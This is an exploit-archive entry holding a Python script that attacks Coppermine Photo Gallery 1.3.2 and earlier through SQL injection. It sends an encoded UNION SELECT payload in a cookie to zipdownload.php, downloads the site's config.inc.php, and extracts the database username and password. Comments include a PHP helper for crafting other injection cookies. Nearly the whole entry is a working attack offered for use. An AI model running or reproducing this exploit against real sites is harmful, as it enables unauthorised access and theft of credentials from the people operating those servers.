Coppermine Photo Gallery <= 1.3.2 File Retrieval SQL Injection Exploit

2005-11-13 00:00:00

# tested and approved /str0ke

#CPG Exploit
#File Retrieval by SQL Injection.
#By Default this exploit get the config.inc.php file which
#contains the db user/pass
#If you want to get another file you need to have the good cookie
#you can use this phpscript to get good cookie :
##<?
##$tab[]=$_GET['inj'];
##$val=base64_encode(serialize($tab));
##echo $val;
##?>
#
#By DiGiTAL_MiDWAY


import urllib2, sys
from urllib import urlencode
import zipfile

if(len(sys.argv)<2):
print 'usage : %s http://host/Path/ tableprefix[default : cpg132_ for v1.3.1 use cpg1d_]' % sys.argv[0]
sys.exit(0)
site=sys.argv[1]
try:
prefix=sys.argv[2]
except:
prefix='cpg132_'

print '''File Retrieval by SQL Injection for Coppermine Photo Gallery v<=1.3.2
by DiGiTAL_MiDWAY [[email protected]]'''

cook='YToxOntpOjA7czo1MToiJycpIFVOSU9OIFNFTEVDVCAnLi4vaW5jbHVkZS8nLCAnY29uZmlnLmluYy5waHAnIC8qIjt9'
# '') UNION SELECT filepath,file /*

req=urllib2.Request(site+'zipdownload.php')
req.add_header('Cookie', urlencode({prefix+'fav' : cook}))

zip=open('test.zip', 'wb')
print '[+]Opening WebPage'
try:
f=urllib2.urlopen(req).read()
except:
print '[+]Failed to opening website', sys.exc_info()
sys.exit(0)
zip.write(f)
zip.close()
monzip=zipfile.ZipFile('test.zip', 'r')
try:
conf=monzip.read('config.inc.php')
except:
print '[+]Exploit failed....'
sys.exit(0)
monzip.close()
conf=conf[conf.find("$CONFIG['dbuser'] =")+len("$CONFIG['dbuser'] ="):]
conf=conf[conf.find("'")+1:]
user=conf[:conf.find("'")]
conf=conf[conf.find("$CONFIG['dbpass'] =")+len("$CONFIG['dbpass'] ="):]
conf=conf[conf.find("'")+1:]
passwd=conf[:conf.find("'")]
print '[+]Exploit Succeed'
print '[+]User :', user, 'Pass :', passwd

#

Fixes

No fixes

In order to submit a new fix you need to be registered.